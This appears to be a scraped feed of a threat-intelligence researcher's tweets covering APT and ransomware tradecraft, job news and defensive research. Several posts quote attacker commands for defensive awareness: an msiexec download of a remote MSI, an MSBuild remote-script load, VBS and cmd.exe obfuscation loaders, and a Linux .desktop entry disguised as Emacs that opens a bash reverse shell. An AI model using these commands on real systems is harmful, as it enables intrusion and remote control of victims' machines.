i’m legit amped about aligning with all of the “tip of the spear” teams under the CISO
this part of the public “secure futures” update is a pretty nice acknowledgment of threat intel impact
let’s go! come join us:
🕵️
👻
🆕 Job Update: I'm joining
@Microsoft
!
On the
#MSTIC
R&D team:
☁️🏹hunting & investigations in the cloud (
#AzureSentinel
,
@Office365
)
🎯✍️🏽writing detections for several platforms
👥🎁community-based research & sharing
🛡️🤲🏽protecting those who need it the most
#DefendingDemocracy
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover?
Start here: 🤩
But then what?? Let’s talk about some post-compromise techniques...
We found the full CARBANAK source code & previously unseen plugins.
Our
#FLARE
team spent 500 hours analyzing the 100,000+ lines of code.
@mykill
&
@jtbennettjr
just dropped day 1 of their 4-part blog series:
Source code linked in blog.
#CarbanakWeek
🦈💳
How most ransomware incidents actually work 🔻
Access brokers sell access to compromised networks to ransomware-as-a-service affiliates, who conduct the intrusions.
Ransomware-as-a-service affiliates prioritize targets based on intended impact or perceived profit
Intrusion…
Mandiant's protection & containment strategies (direct link: ) gives insight into methods observed and defenses that have worked against interactive, post-compromise deployment of ransomware.
@cglyer
& I have covered this extortion trend on
#StateOfTheHack
Kudos to the quiet hero who patiently reconstructed this evidence from RDP bitmap cache. It proved Human Machine Interface (HMI) access that was central to the DHS/ICS-CERT reporting, attributed to RU gov.
Most good
#DFIR
stories are based on hours of difficult & thankless work.
OK so this is my last week at
@Mandiant
/
@FireEye
😢
Here's the truth:
♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me
🧠 Many of the brilliant minds in security are here & we have FUN every day
1/8
Official statement on the root cause of the Hawaii inbound ballistic missile threat alert: “Someone clicked the wrong thing on the computer."
Everyone in infosec nods.
Fresh APT loader technique for today's
#DailyScriptlet
:
cs=Array(#,#,#,#,...): cmd="": For each c in cs: cmd=cmd&Chr(c): Next: cmd=cmd&vbcrlf: Execute(cmd)
This is remotely loaded into memory from source phishing doc that uses renamed wscript & pubprn.vbs to load COM Scriptlet.
Attackers can check your security visibility faster than you can configure it.
Here's an UNC group we track 😉 using Outlook home page (CVE-2017-11774) to check the target's attack surface and process creation & PowerShell event visibility - then sending it to domain-fronted C2.
1. Attackers abuse Pastebin to host payloads.
2. Some security teams abuse Pastebin APIs to keep up with them.
Glad they’ve finally put a stop to... *checks notes* the second one? 🙃
@MrJamesHemmings
API access is still available - . The Scraping API has been discontinued due to active abuse by third parties for commercial purposes, such activity is prohibited by our current T&C’s, please see Section C, P.4.
Blog post by
@OsandaMalith
/
@m3g9tr0n
:
• covers creative NetNTLM/SMBRelay attack techniques - including regsvr32 🤪
• exemplifies the the value of curiosity in security research
• has me questioning some other processes that make network connections...
On the
@FireEye
Advanced Practices Team, we're interested in targeted attackers using Outlook Homepage shell & persistence, made accessible by
@sensepost
's ruler:
There are VERY few of them detected & publicly-uploaded. Here's one:
What if you could magically rank strings based on their maliciousness?
Now you can: 🧙♂️
We open sourced
#StringSifter
today at
@DerbyCon
.
Built for the blue team, probably useful for red 😉
📺 WATCH
@phtully
@iAmThePr0blem
's talk:
"Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness." - Sun Tzu
...
"Nah, bro I'm good." - this red teamer [pictured]
Please enable Network Level Authentication (NLA) for a layer of pre-auth before a connection is established.
This not only reduces the terrifying
#DejaBlue
&
#BlueKeep
RDP attack surface, it's also a top ransomware protection recommendation from
@Mandiant
:
👉🏼 “Federal investigators may be unable to readily distinguish between criminals and innocent parties engaged in intelligence gathering. Consequently, it is possible that individuals engaged in legitimate cybersecurity may become the subject of a criminal investigation.” - DOJ
One-click MS Access database code execution by
@424f424f
: 💥
Static VT detection at 0/59.
I expect some dynamic engines will fail to launch this properly as well.
We’re hiring for our cyber crime / counter-ransomware intelligence mission.
Senior analyst position, some details flexible.
I promise you were are working on globally unique and important capabilities.
🔨A Tough Outlook for Home Page Attacks
🔗
Blog has
#APT33
🇮🇷,
#APT34
🇮🇷, and
#UNC1194
🏴😉 home page persistence & RCE.
🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide!
😱Cool TTPs (pictured)
#GuardrailsOfTheGalaxy
Yesterday we said an early goodbye to our awesome dog Rocket.
Not just a sweet family dog – he had 12 years on the front lines:
• lap-warming through many late night intrusions
• had been in a SCIF 🙃
• co-authored good blogs & all bad tweets
Much love to all the cyber pets!
New blog! This is one of my favorite adversary tradecraft write-ups this year:
It's cool to see case studies written from the attacker's perspective, exploring intrusion choices made.
@cglyer
& I plan to have author
@ramen0x3f
on the next
#StateOfTheHack
!
"Our approach to domain fronting within Azure is a great example of how the ever-changing dynamics of our world have prompted us to re-examine an important and complicated issue — and ultimately make a change."
👉
Let the data speak & reduce attack surface.
Well that's certainly one way to launch mshta! 🧐
Please enjoy this "tasteful" cmd.exe obfuscation before
@danielhbohannon
melts minds in exactly 24 hours with
#DOSfuscation
at Black Hat Asia.
Malicious CSV 🔥 uploaded today. h/t
@TekDefense
0/56 on VT:
🪙 On
#GoldenSAML
remediation:
• Rotate the token-signing AD FS certificate in rapid succession twice
👉If only rotated once, a copy of the previous [compromised?] certificate will still be resident in Azure AD, and can still be used to forge SAML tokens
Critical new defenses for OAuth consent phishing:
• ✅ Publisher verification [pic 1]
• 📋 Customizable app consent policies [pic 2]
• 🚷 Globally disallowing user consent to new multi-tenant apps from unverified publishers (on Nov 8)
👉🏼📰 Details:
Say hello to Fedir Hladyr 👋
The senior sys admin at
#FIN7
's original front company, Combi Security.
He maintained their internal HipChat instance for malware & payment card sharing - and tracked the team's intrusion projects in JIRA.
He puts the "organized" in organized crime.
Good morning. ☕️
Let's try something new.
> wmic process call create
> wmic path win32_process call create
If you share a novel* method to launch a process via wmic – without "process "+"call "+"create " – I will DM you a personal $10 Amazon gift card, up to $100 total today.
I led the first Mandiant incident response engagement into an unknown financial actor that eventually became FIN7. Later discovered the CARBANAK source code.
But today I got to hang with the REAL heroes from FBI Seattle who brought justice
😅 @ W perp walking his perp walk photo
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission:
I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
MSTIC is looking for Senior Security Researchers (Malware Reverse Engineers) in the US and Australia to join our MSTIC-RE team. This is an exciting opportunity to make a tangible difference in combating Nation State (NS/APT/DHA) and ransomware threats.
🚨💪💪🚨
“Today we took action to disrupt...
#Trickbot
, one of the world’s most infamous botnets and prolific distributors of
#ransomware
.”
🆕 legal approach: “Our case includes copyright claims against Trickbot’s malicious use of our software code”
🔗⤵️
In honor of the
@Mandiant
rebrand and the kick-off of
#CyberDefenseSummit
(MIRcon) – I bring to you this important piece of security conference history:
Video is now public for the first time 😂
@cyb3rops
@anthomsec
Not the most technically impressive but one of the more brazen moves was a nation state threat actor using the compromised account of the lead security person to reply all to multiple email threads about the potential incident - telling everyone to stand down
We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs:
#MSTIC
and Defender threat intel collab
➕
#DART
👻 incident response team experience from the trenches [1/3]
@sixdub
@malcomvetter
@InvokeThreatGuy
APT29 HAMMERTOSS did all the things
1. Hosted malz on compromised infra
2. Replaced wermgr.exe - awesome persistence!
3. Algorithm for new Twitter handle daily for APT29 control
4. Additional workweek cmds via GitHub steganography
5. Exfil to cloud storage
Reminder to check all your
#PowerPoint
slides. Some have hyperlink mouseover launch of remote MSI payload stored on
@discordapp
msiexec /i hxxps://cdn.discordapp[.]com/attachments/448418688190775298/455878026576789511/rak.msi /q
💾 "Faktura.ppsx" (2/60):
Found a super spicy 🌶️ take on an
#IQY
file (launched by Excel) while going through my file collections today.
• 0 static VT detections.
• Creative embedded payload & remote launcher.
...turns out it's my coworker
@MrUn1k0d3r
and he's released a POC:
It's been awesome to witness so many teams collaborating to prevent/detect malicious OAuth apps and reduce the attack surface.
Excited for my small part in providing
#AzureSentinel
visibility into suspicious OAuth behavior & tooling. Blog soon!
🙏PwnAuth, O365-attack-toolkit, C3
#APT32
phishing - now with more
#TweeTPs
Windows.csproj & .mp4 downloaded with certutil
MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService"
Payload loaded in memory then deleted from disk
New approaches used by
#OceanLotus
#APT
group, that leverage macro to load code hidden in the table by minimal white font and executes the downloaded payload through MSBUILD.exe. Either AES or RC4 is used for decryption.
url: hxxp://139.59.30.109:8090/abcv
Stopped using PowerShell for attacks?
Seems to be working just fine for
#APT32
🇻🇳
lang.ps1 uploaded yesterday (3/56):
I appreciate their signature obfuscation style (pictured)
The underlying backdoor here is very creative... [1/2]
When our awesome
#MSTIC
Russia team discovered this event unfolding in real-time 🤯, here was our crime triage on how DEV-0586's destructive malware differs from 𝘵𝘺𝘱𝘪𝘤𝘢𝘭 human-operated ransomware.
"Ransom" note in the blog: - anything we missed?
Microsoft identified a unique destructive malware operated by an actor tracked as DEV-0586 targeting Ukrainian organizations. Observed activity, TTPs, and IOCs shared in this new MSTIC blog. We'll update the blog as our investigation unfolds.
In this guide from Checkpoint, they highlight some default sandbox values that payload developers check for [username check pictured]
I’ve long argued that these make for great home computer user/host names – some extra security layers never hurt 😉
Disrupted a cross-cloud BEC campaign impacting hundreds of victims. Here’s a behind-the-scenes look at their custom tools & techniques
There’s tons more happening to disrupt cyber crime – credit for this particular write-up goes to my coauthor
@Stefan0x531
Hopefully federal agencies deemed their blue teams "mission essential."
The last
#shutdown
provided unprecedented network signal-to-noise baselining and resulted in several teams detecting new incidents. It also helped scope a large gov IR by isolating the beaconing servers.
I decided to make my own minimalist
#DailyScriptlet
with... a remote payload!
I've also trimmed the fat (XML definition, script language tag, etc)
112 characters:
<scriptlet>
<registration progid="☺">
<script src=""></script>
</registration>
</scriptlet>
"No engines detected this file" 😒
Let's change that:
^apply this
#yara
rule to unzipped OOXML contents as well!
Pictured: "alpha.docx"
@VirusTotal
(0/60):
Technique by
@enigma0x3
:
#OAuth
techniques are trending again.
Pictured: the time I wrote OAuth app abuse Snort rules and they actually caught the
#APT28
🐻 2016 Russian election interference in-the-wild! [note the date 😉]
Sometimes attackers have more to say – don't forget to check your phishing documents for comments.
#DFIR
In-the-wild [red team] sample this week using character substitution + bitsadmin transfer + csc.exe + .Automation.dll + schtasks 👍🏽
@0rbz_
@Hexacorn
PoC: ready, set SET
Because apparently setting environment variables can be done with environment variables!
set ♫=set
Example 1:
%♫% ☺=pow^er&&%♫% ☻=she^ll
%☺%%☻%
Example 2:
%♫% ♥=e^r
pow%♥%sh%♥:r=ll%
🆕 🔥 Research on PDB Paths from
@stvemillertime
:
#DFIR
primer & exploration of these wonderful artifacts.
Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov.
THREAD (1/n)
APT32 loves living off the land.
They copy & rename legit binaries with their initial phish's macros.
🆕 macro method this week, heavy on VBS arrays, persists:
C:\ProgramData\ErroLogon.exe //E:vbscript /b C:\ProgramData\Error.log
Analyzed with
@a_tweeter_user
#AdversaryMethods
Fun fact: the WMI EventFilter registered by this
#DailyScriptlet
for persistence leverages TargetInstance.SystemUptime to specify a launch time range (in seconds).
For malware, the range is often chosen to allow the system to fully boot then launch once.
Method in Vault 7 leak.
How about a
#DailyScriptlet
with spicy VBS obfuscation using split, eval, and chr arithmetic
Launches:
1⃣ Metasploit-style shellcode
2⃣ Registry persistent remote mshta
3⃣ WMI persistent
#squiblydoo
[pictured] cc:
@cglyer
"reg9.sct" uploaded this week:
🚨 Coordinated Global DNS Record Manipulation Campaign
@CyberAmyntas
shares in-the-wild TTPs [pictured]
@bread08
shows connection to
#Iran
🇮🇷
We're still scoping a LARGE amount of activity.
After you 2FA your domain administration portal, read the blog:
Come work with us on the core threat intelligence team: “The Microsoft Threat Intelligence Center (MSTIC) is recruiting experienced nation-state threat hunters – with highly honed threat intelligence analysis skills.”
LFG:
Please DM me if we have worked…
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission:
I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
So I started watching Hawkeye as an escape from work. Only to find out it’s *also* about a bunch of Eastern European criminals in tracksuits with ties to fake security companies
Two-factor authentication:
1⃣Something you know
+
2⃣Something y̶o̶u̶ ̶h̶a̶v̶e̶
your kids are playing with 📱
while you try to finish this one thing
but now you can't do it
In light of the
#FIN7
"Combi Security" DOJ indictment, we've released our massive technical post and indicator release:
We reveal new information from
@Mandiant
IRs about the extent of FIN7's crimes, their innovative techniques, & how to find them today.
Just knocked out the Scranton Half Marathon in some classic PA weather (35 degrees, pouring rain throughout) 🌧🏃🏻♂️
Still managed to get a personal record
1:43:03 @ 7:52 pace 🎉
thanks to a training plan from
@BeWellDianna
If you like to breakdown malicious scripts, I can't recommend
@GCHQ
's
#CyberChef
enough.
You can also create reusable recipes for auto-extraction & decoding of popular encoding techniques.
Example: extracting shellcode from a metasploit-style PowerShell payload
#DailyScriptlet
Yes!
#APT29
🇷🇺 invented this afaik in 2014 when we saw it first-hand (
#NoEasyBreach
).
The key here is it gives timestomping capabilities. Bad guy specifies timestamps within the XML, schtasks applies them. So you can hijack/overwrite existing named scheduled tasks & be a ghost 👻
Pretty cool combination of techniques in the wild:
• External relationship linked within XML with "soap:wsdl=" syntax
• Many layers of encoding including PowerShell in VBE
Uploaded an hour ago, VT Detection: 6/61:
Certutil execution of malicious Base64 content used by APT29 since at least 2014.
@mattifestation
(or
@subTee
?) found/popularized the remote certutil method, loved by APT34/OilRig and many others.
Our teammate
@stvemillertime
shows how to watch your network for it.
#dailypcap
Attackers still use .IQY file extensions to execute code with Excel.
It's a bit clunky on execution, but is super lightweight and easy to use multiple stage payloads. 🤷🏻♂️
Here's a sample using
@pastebin
uploaded 15 minutes ago to VT (0/55): CC:
@ScumBots
I know you SO many of you have had intense 2020s – but let me just tell you, I’m hitting with the heavyweights over here 🥴🥊
You cannot imagine the number of life changing events.
I don’t say that to diminish what you’re going through... it’s more that I’m walking with you. ✊🏼
If you want to contribute on a fun team with great data
getting to ground truth on intrusions 🕵️ – especially in the cloud 😶🌫️ –
Microsoft's Detection and Response Team (
#DART
👻) is hiring:
#DFIR
... also their swag game is on point 🎯👌
Malicious shortcuts - not just for Windows anymore?
On Linux, drop any code into a .desktop file:
[Desktop Entry]
Name=Emacs
Exec=/bin/bash -i >& /dev/tcp/[RHOST]/[RPORT] 0>&1
Icon=
Terminal=false
Type=Application
#NoShortcuts
[1/2]